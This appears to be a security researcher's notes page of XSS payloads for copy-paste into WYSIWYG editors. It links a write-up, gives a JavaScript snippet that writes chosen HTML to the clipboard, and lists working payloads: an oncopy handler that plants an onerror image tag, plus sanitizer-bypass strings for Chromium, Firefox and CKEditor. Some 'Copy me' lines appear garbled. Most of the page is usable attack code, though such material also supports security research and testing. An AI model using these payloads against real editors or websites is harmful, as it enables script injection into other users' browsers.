WYSIWYG XSS Payloads

Post

https://research.securitum.com/the-curious-case-of-copy-paste/

Clipboard Code

<button id="copyButton">Copy Me</button>
<script>
document.getElementById('copyButton').addEventListener('click', async () => {
  const textToCopy = '';
  const htmlToCopy = `YOUR RAW CODE`;
  
  try {
    await navigator.clipboard.write([
      new ClipboardItem({
        'text/plain': new Blob([textToCopy], { type: 'text/plain' }),
        'text/html': new Blob([htmlToCopy], { type: 'text/html' })
      })
    ]);
    console.log('성공');
  } catch (err) {
    console.error('실패', err);
  }
});
</script>

Payloads

Clipboard basic

document.oncopy = event => {
  event.preventDefault();
  event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
}

Chromium

(start)
a<math>b<xss style=display:block>c<style>d<a title="</style><img src onerror=alert(1)>">e
(end)

Copy me=> (start) a $b<xss style=display:block;>c d e
(end)$

Firefox

(start)
<style>
@import''; 
@font-face { font-family: 'ab<\/style><img src onerror=alert(1)>'}
</style>
(end)

Copy me => (start)

(end)

CKEditor

(start)
A<!--{ce_protected}{C}%3C!%2D%2D%20comment%20%2D%2D%3E-->B
(end)

Copy me => (start) AB (end)